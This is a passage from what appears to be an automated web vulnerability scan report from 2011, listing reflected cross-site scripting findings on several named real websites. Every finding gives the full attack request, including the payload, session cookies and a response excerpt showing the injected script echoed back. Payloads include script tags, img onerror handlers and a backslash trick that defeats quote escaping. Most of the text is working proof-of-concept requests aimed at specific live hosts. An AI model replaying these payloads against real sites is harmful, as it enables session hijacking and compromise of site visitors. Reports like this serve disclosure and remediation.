The value of the FE%5Bfe_users%5D%5Busername%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9168b\'%3balert(1)//a686935bb7e was submitted in the FE%5Bfe_users%5D%5Busername%5D parameter. This input was echoed as 9168b\\';alert(1)//a686935bb7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith9168b\'%3balert(1)//a686935bb7e&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:26:52 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<![CDATA[*/
   updateForm('fe_users_form','FE[fe_users][username]','RonaldSmith9168b\\';alert(1)//a686935bb7e');
   updateForm('fe_users_form','FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_
...[SNIP]...
4.182. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzip%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzip%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae89\'%3balert(1)//e69150d97f4 was submitted in the FE%5Bfe_users%5D%5Bzip%5D parameter. This input was echoed as bae89\\';alert(1)//e69150d97f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3bae89\'%3balert(1)//e69150d97f4&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:27:04 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27286

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][alias]','');
   updateForm('fe_users_form','FE[fe_users][status]','');
   updateForm('fe_users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3bae89\\';alert(1)//e69150d97f4');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('f
...[SNIP]...
4.183. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bzone%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bzone%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54774\'%3balert(1)//0f6ddc84b8a was submitted in the FE%5Bfe_users%5D%5Bzone%5D parameter. This input was echoed as 54774\\';alert(1)//0f6ddc84b8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL54774\'%3balert(1)//0f6ddc84b8a&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:27:13 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
users_form','FE[fe_users][title]','3');
   updateForm('fe_users_form','FE[fe_users][zip]','3');
   updateForm('fe_users_form','FE[fe_users][city]','3');
   updateForm('fe_users_form','FE[fe_users][zone]','AL54774\\';alert(1)//0f6ddc84b8a');
   updateForm('fe_users_form','FE[fe_users][static_info_country]','AFG');
   updateForm('fe_users_form','FE[fe_users][country]','');
   updateForm('fe_users_form','FE[fe_users][language]','');
   updateFor
...[SNIP]...
4.184. http://www.reed-elsevier.com/Telerik.Web.UI.WebResource.axd [_TSM_CombinedScripts_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reed-elsevier.com
Path:   /Telerik.Web.UI.WebResource.axd

Issue detail

The value of the _TSM_CombinedScripts_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35375"-alert(1)-"dda4f53d366 was submitted in the _TSM_CombinedScripts_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Telerik.Web.UI.WebResource.axd?_TSM_HiddenField_=ctl00_ScriptManager_HiddenField&compress=1&_TSM_CombinedScripts_=%3b%3bSystem.Web.Extensions%2c+Version%3d3.5.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d31bf3856ad364e35%3aen-US%3a94b8a2b4-5efc-4f4c-9641-d912b698978d%3aea597d4b%3ab25378d2%3bTelerik.Web.UI%2c+Version%3d2009.3.1103.35%2c+Culture%3dneutral%2c+PublicKeyToken%3d121fae78165ba3d4%3aen-US%3a4552b812-caf7-4129-9b53-8f199b5bce6c%3a16e4e7cd%3af7645509%3a24ee1bba%3ae330518b%3a1e771326%3a8e6f0d33%3a6a6d718d%3ac8618e4135375"-alert(1)-"dda4f53d366 HTTP/1.1
Host: www.reed-elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=18399930.1302905572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18399930.407322604.1302905572.1302905572.1302961730.2; __utmc=18399930; __utmb=18399930.2.10.1302961730; ebNewBandWidth_.www.reed-elsevier.com=1930%3A1302905571919;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 14:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6315
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Sun, 15 Apr 2012 14:15:06 GMT
Last-Modified: Thu, 11 Feb 2010 14:43:21 GMT
Vary: Accept-Encoding, User-Agent
Content-Type: application/x-javascript
Content-Length: 311021

/* START MicrosoftAjax.js */
//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//--------------------------------------------
...[SNIP]...
ultiPageScripts.js */
/* START */
/* ERROR: Unable to load script from assembly 'Telerik.Web.UI, Version=2009.3.1103.35, Culture=neutral, PublicKeyToken=121fae78165ba3d4', script name hash 'c8618e4135375"-alert(1)-"dda4f53d366' */
/* END */
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {if(!$get('ctl00_ScriptManager_HiddenField')) return; $get('ctl00_ScriptManager_Hi
...[SNIP]...
4.185. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staysafeonline.org
Path:   /emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b97eb"><img%20src%3da%20onerror%3dalert(1)>f6a4e450b1c was submitted in the REST URL parameter 4. This input was echoed as b97eb"><img src=a onerror=alert(1)>f6a4e450b1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emvideo/modal/975/425b97eb"><img%20src%3da%20onerror%3dalert(1)>f6a4e450b1c/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 HTTP/1.1
Host: www.staysafeonline.org
Proxy-Connection: keep-alive
Referer: http://www.staysafeonline.org/tools-resources/staysafeonline-videos
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.12.9.1303044859548

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:39 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 17 Apr 2011 13:00:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2506
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<embed src="/custom-video/1-15-high.mp4" width="425b97eb"><img src=a onerror=alert(1)>f6a4e450b1c" height="350" autoplay="true" controller="true" type="video/quicktime" scale="tofit" pluginspage="http://www.apple.com/quicktime/download/">
...[SNIP]...
4.186. http://www.staysafeonline.org/emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staysafeonline.org
Path:   /emvideo/modal/975/425/350/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e90ef"><img%20src%3da%20onerror%3dalert(1)>ff5fd031a2b was submitted in the REST URL parameter 5. This input was echoed as e90ef"><img src=a onerror=alert(1)>ff5fd031a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emvideo/modal/975/425/350e90ef"><img%20src%3da%20onerror%3dalert(1)>ff5fd031a2b/field_ncsa_video_link/zzz_custom_url/custom-video/1-15-high.mp4&random=1303045001639 HTTP/1.1
Host: www.staysafeonline.org
Proxy-Connection: keep-alive
Referer: http://www.staysafeonline.org/tools-resources/staysafeonline-videos
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.12.9.1303044859548

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:00:49 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 17 Apr 2011 13:00:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 2506
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<embed src="/custom-video/1-15-high.mp4" width="425" height="350e90ef"><img src=a onerror=alert(1)>ff5fd031a2b" autoplay="true" controller="true" type="video/quicktime" scale="tofit" pluginspage="http://www.apple.com/quicktime/download/">
...[SNIP]...
4.187. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34888"><script>alert(1)</script>721f99e013c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory34888"><script>alert(1)</script>721f99e013c/index.htm?reset=InventoryListing HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.3.8.1302976680881

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14378
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:44 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5fa27'-alert(document.cookie)-'bad3f5b4489&amp;20=www.theautomastermercedesbenz.com&amp;21=/certified-inventory34888"><script>alert(1)</script>721f99e013c/index.htm&amp;50=5f47f9aa0a0a002f005f07e845da2017&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...
4.188. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBbodystyle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the HTML document as plain text between tags. The payload 5c46c<script>alert(1)</script>0f97ee897e7 was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW&SBmodel=clear&SBbodystyle=clear5c46c<script>alert(1)</script>0f97ee897e7&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:17 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36775

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW clear5c46c<script>alert(1)</script>0f97ee897e7 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...
4.189. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmake parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the HTML document as plain text between tags. The payload 1bd3e<script>alert(1)</script>56a64775370 was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW1bd3e<script>alert(1)</script>56a64775370&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:58:07 GMT
Connection: close
Cache-Control: no-store
Content-Length: 36649

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Certified preowned vehicles: buy a used car, truck, SUV, automobile</title>
   <meta http-e
...[SNIP]...
<div>
                                                           
                                               
       Sorry, no BMW1bd3e<script>alert(1)</script>56a64775370 Certified vehicles are currently in stock.    
       
                                   &nbsp;To search for other vehicles, please use the Narrow Search bar above.                
                           <br />
...[SNIP]...
4.190. http://www.theautomastermercedesbenz.com/certified-inventory/index.htm [SBmodel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /certified-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the HTML document as plain text between tags. The payload 24ae3<script>alert(1)</script>9446c4033ba was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /certified-inventory/index.htm?SByear=clear&SBmake=BMW&SBmodel=clear24ae3<script>alert(1)</script>9446c4033ba&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/certified-inventory/index.htm?reset=InventoryListing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124194511.1302973377.1.1.utmcsr=theautomaster.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.htm; ssoid=5f47f9aa0a0a002f005f07e845da2017; JSESSIONID=66tdcl45e69v5; ddcpoolid=CmsPoolO; __utma=124194511.1620789493.1302973377.1302973377.1302973629.2; __utmc=124194511; __utmb=124194511.5.8.1302976687612

Response

HTTP/1.1 200 OK
